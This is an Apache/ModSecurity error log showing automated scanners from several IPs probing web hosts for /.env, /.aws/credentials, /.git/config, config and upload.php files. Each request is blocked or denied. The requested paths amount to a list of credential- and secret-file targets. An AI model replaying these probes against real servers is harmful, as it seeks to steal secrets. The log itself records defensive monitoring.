[Fri Sep 26 07:46:01.152463 2025] [:error] [pid 3022408] [client 185.177.72.21:42526] [client 185.177.72.21] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aNYomVnYmoc4_LOl_xJWqwAAAAc"]
[Fri Sep 26 07:46:01.152652 2025] [:error] [pid 3022408] [client 185.177.72.21:42526] [client 185.177.72.21] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aNYomVnYmoc4_LOl_xJWqwAAAAc"]
[Fri Sep 26 07:46:01.170226 2025] [authz_core:error] [pid 3017923] [client 185.177.72.21:42484] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config.json
[Fri Sep 26 07:46:01.197407 2025] [authz_core:error] [pid 3017923] [client 185.177.72.21:42484] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config.json
[Fri Sep 26 07:46:03.697408 2025] [authz_core:error] [pid 3017923] [client 185.177.72.21:42484] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/settings.py
[Fri Sep 26 07:46:03.726536 2025] [authz_core:error] [pid 3017923] [client 185.177.72.21:42484] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/settings.py
[Fri Sep 26 07:46:06.595610 2025] [:error] [pid 3017923] [client 185.177.72.21:42484] [client 185.177.72.21] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aNYonglYhA3fp197bl9fSAAAAAI"]
[Fri Sep 26 07:46:06.596026 2025] [:error] [pid 3017923] [client 185.177.72.21:42484] [client 185.177.72.21] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aNYonglYhA3fp197bl9fSAAAAAI"]
[Fri Sep 26 07:46:06.596210 2025] [:error] [pid 3017923] [client 185.177.72.21:42484] [client 185.177.72.21] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aNYonglYhA3fp197bl9fSAAAAAI"]
[Fri Sep 26 07:46:06.623414 2025] [:error] [pid 3017923] [client 185.177.72.21:42484] [client 185.177.72.21] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aNYonglYhA3fp197bl9fSQAAAAI"]
[Fri Sep 26 07:46:06.623811 2025] [:error] [pid 3017923] [client 185.177.72.21:42484] [client 185.177.72.21] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aNYonglYhA3fp197bl9fSQAAAAI"]
[Fri Sep 26 07:46:06.623976 2025] [:error] [pid 3017923] [client 185.177.72.21:42484] [client 185.177.72.21] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aNYonglYhA3fp197bl9fSQAAAAI"]
[Fri Sep 26 07:46:06.652680 2025] [:error] [pid 3017923] [client 185.177.72.21:42484] [client 185.177.72.21] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aNYonglYhA3fp197bl9fSgAAAAI"]
[Fri Sep 26 07:46:06.653084 2025] [:error] [pid 3017923] [client 185.177.72.21:42484] [client 185.177.72.21] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aNYonglYhA3fp197bl9fSgAAAAI"]
[Fri Sep 26 07:46:06.653271 2025] [:error] [pid 3017923] [client 185.177.72.21:42484] [client 185.177.72.21] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aNYonglYhA3fp197bl9fSgAAAAI"]
[Fri Sep 26 07:46:06.679154 2025] [:error] [pid 3017923] [client 185.177.72.21:42484] [client 185.177.72.21] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aNYonglYhA3fp197bl9fSwAAAAI"]
[Fri Sep 26 07:46:06.679609 2025] [:error] [pid 3017923] [client 185.177.72.21:42484] [client 185.177.72.21] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aNYonglYhA3fp197bl9fSwAAAAI"]
[Fri Sep 26 07:46:06.679797 2025] [:error] [pid 3017923] [client 185.177.72.21:42484] [client 185.177.72.21] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aNYonglYhA3fp197bl9fSwAAAAI"]
[Fri Sep 26 13:42:46.747502 2025] [:error] [pid 3025880] [client 196.251.70.47:33700] [client 196.251.70.47] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aNZ8NuKjDYFB79U7FuFIlgAAAA8"]
[Fri Sep 26 13:42:46.747798 2025] [:error] [pid 3025880] [client 196.251.70.47:33700] [client 196.251.70.47] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aNZ8NuKjDYFB79U7FuFIlgAAAA8"]
[Fri Sep 26 13:42:46.747969 2025] [:error] [pid 3025880] [client 196.251.70.47:33700] [client 196.251.70.47] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aNZ8NuKjDYFB79U7FuFIlgAAAA8"]
[Fri Sep 26 17:22:18.725581 2025] [:error] [pid 3017923] [client 176.65.149.195:57840] [client 176.65.149.195] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNavqglYhA3fp197bl9fjQAAAAI"]
[Fri Sep 26 17:22:18.725889 2025] [:error] [pid 3017923] [client 176.65.149.195:57840] [client 176.65.149.195] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNavqglYhA3fp197bl9fjQAAAAI"]
[Fri Sep 26 17:22:18.726060 2025] [:error] [pid 3017923] [client 176.65.149.195:57840] [client 176.65.149.195] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNavqglYhA3fp197bl9fjQAAAAI"]
[Fri Sep 26 19:02:04.332504 2025] [:error] [pid 3025876] [client 213.209.157.232:49206] [client 213.209.157.232] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aNbHDJ_1ngbPdBJawFbMegAAAAs"]
[Fri Sep 26 19:02:04.332810 2025] [:error] [pid 3025876] [client 213.209.157.232:49206] [client 213.209.157.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aNbHDJ_1ngbPdBJawFbMegAAAAs"]
[Fri Sep 26 19:02:04.332984 2025] [:error] [pid 3025876] [client 213.209.157.232:49206] [client 213.209.157.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aNbHDJ_1ngbPdBJawFbMegAAAAs"]
[Sat Sep 27 07:39:51.991221 2025] [:error] [pid 3041456] [client 213.209.157.244:42768] [client 213.209.157.244] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aNd4p2JlS4ShidghCtXXPgAAAAI"]
[Sat Sep 27 07:39:51.991479 2025] [:error] [pid 3041456] [client 213.209.157.244:42768] [client 213.209.157.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aNd4p2JlS4ShidghCtXXPgAAAAI"]
[Sat Sep 27 07:39:51.991664 2025] [:error] [pid 3041456] [client 213.209.157.244:42768] [client 213.209.157.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aNd4p2JlS4ShidghCtXXPgAAAAI"]
[Sat Sep 27 17:49:21.185094 2025] [authz_core:error] [pid 3041456] [client 185.247.226.33:2760] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/upload_handler.php
[Sat Sep 27 17:49:25.370734 2025] [authz_core:error] [pid 3044443] [client 185.247.226.33:31416] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/upload.php
[Sat Sep 27 17:49:29.035867 2025] [authz_core:error] [pid 3054806] [client 185.247.226.33:31568] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/modules
[Sat Sep 27 17:49:35.251934 2025] [authz_core:error] [pid 3044443] [client 185.247.226.33:18416] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/upload.php
[Sat Sep 27 17:49:40.961797 2025] [php:error] [pid 3041456] [client 185.247.226.33:18626] script '/var/www/magento.test.indacotrentino.com/www/pub/images/upload.php' not found or unable to stat
[Sat Sep 27 17:49:57.328196 2025] [authz_core:error] [pid 3041455] [client 185.247.226.33:56784] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/bin/upload.php
[Sat Sep 27 17:50:00.516740 2025] [php:error] [pid 3041484] [client 185.247.226.33:56900] script '/var/www/magento.test.indacotrentino.com/www/setup/upload.php' not found or unable to stat
[Sun Sep 28 01:44:43.038855 2025] [:error] [pid 3063422] [client 196.251.88.64:45750] [client 196.251.88.64] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aNh262vYzfmWXkVv98vZlAAAAAE"]
[Sun Sep 28 01:44:43.039148 2025] [:error] [pid 3063422] [client 196.251.88.64:45750] [client 196.251.88.64] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aNh262vYzfmWXkVv98vZlAAAAAE"]
[Sun Sep 28 01:44:43.039303 2025] [:error] [pid 3063422] [client 196.251.88.64:45750] [client 196.251.88.64] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aNh262vYzfmWXkVv98vZlAAAAAE"]
[Sun Sep 28 05:51:44.733836 2025] [:error] [pid 3066348] [client 212.11.64.8:36018] [client 212.11.64.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/"] [unique_id "aNiw0DG594Re1GLaq7BKaQAAAAU"]
[Sun Sep 28 05:51:44.734168 2025] [:error] [pid 3066348] [client 212.11.64.8:36018] [client 212.11.64.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/"] [unique_id "aNiw0DG594Re1GLaq7BKaQAAAAU"]
[Sun Sep 28 05:51:44.734327 2025] [:error] [pid 3066348] [client 212.11.64.8:36018] [client 212.11.64.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/"] [unique_id "aNiw0DG594Re1GLaq7BKaQAAAAU"]
[Sun Sep 28 05:51:44.856630 2025] [:error] [pid 3066336] [client 212.11.64.8:36030] [client 212.11.64.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aNiw0EtNIKUouho1MpsrjQAAAAQ"]
[Sun Sep 28 05:51:44.856860 2025] [:error] [pid 3066336] [client 212.11.64.8:36030] [client 212.11.64.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aNiw0EtNIKUouho1MpsrjQAAAAQ"]
[Sun Sep 28 05:51:44.857012 2025] [:error] [pid 3066336] [client 212.11.64.8:36030] [client 212.11.64.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aNiw0EtNIKUouho1MpsrjQAAAAQ"]
[Sun Sep 28 09:26:05.082854 2025] [:error] [pid 3070825] [client 176.65.149.195:53406] [client 176.65.149.195] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNjjDTPSUNyf05OPXuLEQAAAADs"]
[Sun Sep 28 09:26:05.084200 2025] [:error] [pid 3070825] [client 176.65.149.195:53406] [client 176.65.149.195] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNjjDTPSUNyf05OPXuLEQAAAADs"]
[Sun Sep 28 09:26:05.084354 2025] [:error] [pid 3070825] [client 176.65.149.195:53406] [client 176.65.149.195] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aNjjDTPSUNyf05OPXuLEQAAAADs"]
